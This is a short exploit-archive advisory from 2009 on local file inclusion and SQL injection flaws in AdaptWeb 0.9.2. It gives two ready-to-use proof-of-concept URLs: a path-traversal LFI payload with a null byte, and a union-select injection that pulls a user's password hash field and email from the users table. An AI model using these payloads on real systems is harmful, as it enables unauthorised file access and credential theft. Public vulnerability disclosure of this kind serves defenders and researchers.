[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
# Published : 2009-06-15
# Author : SirGod
# Previous Title : Elvin BTS 1.2.0 Multiple Remote Vulnerabilities
# Next Title : Evernew Free Joke Script 1.2 Remote Change Password Exploit
#################################################################################################################
[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Script : http://adaptweb.sourceforge.net/
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Script homepage : http://adaptweb.sourceforge.net/
[+] Local File Inclusion
- PoC
http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00
[+] SQL Injection
- PoC
http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1
#################################################################################################################
# www.Syue.com [2009-06-15]